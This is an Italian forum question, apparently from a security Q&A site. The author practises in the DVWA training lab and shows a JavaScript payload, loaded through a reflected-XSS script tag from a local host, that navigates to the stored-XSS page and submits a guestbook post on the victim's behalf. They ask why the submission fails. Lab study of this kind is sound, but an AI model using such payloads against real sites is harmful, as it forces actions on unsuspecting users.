In DVWA sto cercando di capire diversi metodi di attacco rispetto al solito scenario alert('XSS');
.
Utilizzo XSS riflettente per fornire un carico utile che consente all'utente che segue l'URL di inviare un post nella sezione XSS memorizzato nella stessa applicazione Web. Ecco il mio codice JS esterno
var pagech = document.getElementsByTagName('a')[11].click();
var name = document.getElementsByName("txtName")[0].value="helloworld";
var comment = document.getElementsByName("mtxMessage")[0].value="helloworld2";
var sub = document.getElementsByTagName('input')[1].click();
Questo codice passa fondamentalmente la pagina alla pagina xss memorizzata e inserisce alcuni valori, quindi invia il modulo, funziona all'interno della console firebug ma non quando lo eseguo utilizzando la vulnerabilità di xss riflessa di seguito.
<script src="http://172.16.150.172/dvwa/hackable/uploads/XSS.js"></script>
Invece la pagina degli utenti cambia ma il post non viene inviato. Come posso risolvere questo problema se è possibile?